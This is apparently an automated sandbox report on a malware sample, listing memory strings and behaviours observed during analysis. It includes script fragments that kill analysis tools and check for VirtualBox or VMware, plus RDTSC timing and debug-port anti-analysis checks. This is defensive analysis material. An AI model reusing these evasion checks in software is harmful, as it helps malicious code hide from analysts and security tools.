              Source: oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938810056.000000000197E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938611568.0000000001976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658351726.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEC
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE&
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEBY
              Source: oxhvi.msc, 00000008.00000002.1660289519.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658603791.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1659027225.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")M
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809229436.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809063445.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1810786796.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940414154.00000000018E3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807513564.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809229436.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809063445.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1810786796.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENOCA+
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1941308878.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940816388.00000000018D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660500046.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000007EBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 809904 second address: 80990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 809B7E second address: 809B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: C79904 second address: C7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: C79B7E second address: C79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: FC9904 second address: FC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 959904 second address: 95990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: FC9B7E second address: FC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 959B7E second address: 959B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 29D9904 second address: 29D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 519B7E second address: 519B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 29D9B7E second address: 29D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2E19904 second address: 2E1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2E19B7E second address: 2E19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00409AB0 rdtsc 15_2_00409AB0
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8486Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1453Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 746Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 4767Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 5204Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscAPI coverage: 5.4 %
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeAPI coverage: 1.7 %
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeAPI coverage: 1.2 %
              Source: C:\Windows\explorer.exe TID: 1148Thread sleep time: -16972000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 1148Thread sleep time: -2906000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep count: 4767 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep time: -9534000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep count: 5204 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2744Thread sleep time: -10408000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 49 > 30
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 178 > 30
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe TID: 3428Thread sleep count: 108 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A2F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A2F826
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A41630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00A41630
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A51FF8 FindFirstFileExA,0_2_00A51FF8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_0059E387
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059D836
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059DB69
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005A9F9F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005AA0FA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_005AA488
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_005A65F1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056C642 FindFirstFileExW,8_2_0056C642
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A7248 FindFirstFileW,FindClose,8_2_005A7248
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_005A72E9
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A44E14 VirtualQuery,GetSystemInfo,0_2_00A44E14
              Source: oxhvi.msc.exe, 00000016.00000003.1808791930.0000000000CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe~_
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
              Source: explorer.exe, 00000011.00000002.2639211861.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenA
              Source: oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
              Source: oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then0
              Source: oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenT
              Source: explorer.exe, 00000011.00000002.2639211861.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000011.00000000.1639216371.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 00000011.00000000.1639216371.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.00000000018CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
              Source: oxhvi.msc.exe, 0000001B.00000003.1940271086.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then+
              Source: oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then0\b
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657788132.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657811765.0000000000F02000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939938542.000000000191D000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938671200.0000000001912000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939967299.0000000001920000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenw
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1416105702.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4b
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeU
              Source: oxhvi.msc.exe, 00000016.00000003.1807405255.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807463065.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1808791930.0000000000CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeU_
              Source: oxhvi.msc.exe, 0000001B.00000002.1942146299.0000000001898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then\CO
              Source: oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeJ
              Source: oxhvi.msc, 00000008.00000003.1658126210.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658458510.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658223694.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then13rH
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
              Source: explorer.exe, 00000011.00000002.2639211861.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: oxhvi.msc.exe, 00000016.00000003.1808461197.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeAPI call chain: ExitProcess graph end nodegraph_0-30265
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
